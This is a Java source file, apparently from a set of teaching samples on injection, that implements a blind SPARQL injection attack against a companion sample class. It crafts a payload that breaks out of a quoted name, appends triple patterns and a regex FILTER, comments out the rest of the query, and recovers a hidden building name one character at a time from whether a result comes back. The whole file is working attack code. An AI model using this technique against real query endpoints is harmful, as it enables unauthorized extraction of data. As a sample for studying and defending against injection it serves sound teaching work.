package injection.sample2_Blind_SPARQL_Injection;

// Blind SPARQL Injection
public class Sample2hack {
	// Could be Character.MIN_VALUE..Character.MAX_VALUE, it just would take some more time
	private static final String POSSIBLE_LETTERS = "abcdefghijklmnopqrstuvwyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ";
	
	public static boolean tryBlind(String s) throws Exception{
		Sample2code sample = new Sample2code();
		String name = "Pablo Orduna' . " +
			"?b1 a injection:Building . " +
			"?b1 injection:name ?buildingName . " +
			"FILTER  regex(?buildingName, \"^" + s + ".*\") . " +
		"} #"; // }:-D
		
		String result = sample.run(name);
		// result will be Pablo or null
		return result != null;
	}
	
	public static String recursively(String letters) throws Exception{
		for(int i = 0; i < POSSIBLE_LETTERS.length(); ++i){
			// This part might be optimized by using binary search:
			// first asking for [A-M], then for [G-M] in the regular expression...
			char c = POSSIBLE_LETTERS.charAt(i);
			if(tryBlind(letters + c)){
				System.out.println(c);
				return "" + c + recursively(letters + c);
			}
		}
		return "";
	}
	
	public static void main(String [] args) throws Exception{
		System.out.println(recursively(""));
	}
}